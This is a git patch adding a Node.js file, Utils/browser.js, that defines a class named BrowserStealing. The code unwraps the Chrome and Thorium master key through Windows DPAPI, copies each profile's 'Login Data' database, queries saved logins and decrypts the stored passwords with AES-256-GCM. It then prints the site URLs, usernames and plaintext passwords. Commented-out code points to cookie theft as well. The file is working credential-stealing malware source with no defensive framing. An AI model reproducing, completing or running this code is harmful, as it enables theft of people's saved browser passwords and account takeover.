From 4619948c9e14998ed34479c1205badbef795a30c Mon Sep 17 00:00:00 2001 From: gumbobr0t <96620548+gumbobr0t@users.noreply.github.com> Date: Sat, 18 Nov 2023 16:32:31 +0100 Subject: [PATCH] Add files via upload --- Utils/browser.js | 136 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 136 insertions(+) create mode 100644 Utils/browser.js diff --git a/Utils/browser.js b/Utils/browser.js new file mode 100644 index 0000000..a69bfa2 --- /dev/null +++ b/Utils/browser.js @@ -0,0 +1,136 @@ +const os = require('os'); +const fs = require('fs'); +const sqlite3 = require('sqlite3').verbose(); +const dpapi = require('./node-dpapi'); +const crypto = require('crypto') +const path = require('path') + +class BrowserStealing { + constructor() { + this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')] + this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'] + this.password_command = 'SELECT action_url, username_value, password_value FROM logins'; + //this.cookie_command = 'SELECT * FROM cookies'; + this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`; + this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`; + + //this.cookie_count = 0 + this.password_count = 0 + } + + generateRandomString() { + const randomCharacter = () => Math.random().toString(36).substring(2, 3).toUpperCase(); + return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`; + } + + async getPasswords() { + fs.mkdir(this.tempDirCreated, (error) => { + if (error) { + console.error('Error creating temp directory:', error); + return; + } + console.log('Temp Directory created successfully.'); + for (const browserPath of this.browserPaths) { + console.log(browserPath); + const local_state = path.join(browserPath, 'Local State'); + console.log(local_state); + + fs.readFile(local_state, 'utf8', (err, data) => { + if (err) { + console.error('Error reading local state file:', err); + return; + } + + const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5); + + const decrypted = dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser"); + + console.log('Decryption Key:', decrypted); + + for (const profile of this.browserProfiles) { + const password_file = path.join(browserPath, profile, 'Login Data') + console.log(password_file) + const decryption_file = path.join(this.tempDirCreated, this.generateRandomString()) + console.log(decryption_file) + + fs.copyFile(password_file, decryption_file, (error) => { + if (error) { + console.error('Error copying login data file:', error); + return; + } + console.log('Login data file copied successfully.'); + + const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => { + if (err) { + console.error('Error opening login database:', err); + return; + } + + db.all(this.password_command, (err, rows) => { + if (err) { + console.error('Error executing login SQLite command:', err); + } else { + const formattedRows = rows.map(row => { + if (row && row['password_value']) { + let password_value = row['password_value']; + let start = password_value.slice(3, 15), + middle = password_value.slice(15, password_value.length - 16), + end = password_value.slice(password_value.length - 16, password_value.length), + decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start); + decipher.setAuthTag(end); + + this.password_count++; + + return { + action_url: row.action_url ? row.action_url.toString() : '', + username_value: row.username_value ? row.username_value.toString() : '', + password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(), + }; + } else { + return { + action_url: '', + username_value: '', + password_value: '', + }; + } + }); + + console.log('Password list:', formattedRows); + console.log('Password count:', this.password_count); + } + + db.close((err) => { + if (err) { + console.error('Error closing login database:', err); + } + }); + }); + }); + }); + fs.unlink(decryption_file, (error) => { + if (error) { + console.error('Error deleting decryption password file:', error); + } else { + console.log('Decryption password File deleted successfully.'); + } + }); + } + }); + } + }); + //this.cleanUp() + } + + //cleanUp() { + // fs.rm(this.tempDirCreated, { recursive: true }, (error) => { + // if (error) { + // console.error('Error deleting temp directory:', error); + // } else { + // console.log('Temp Directory deleted successfully.'); + // } + // }); + //} +} + +const browserStealer = new BrowserStealing(); +browserStealer.getPasswords()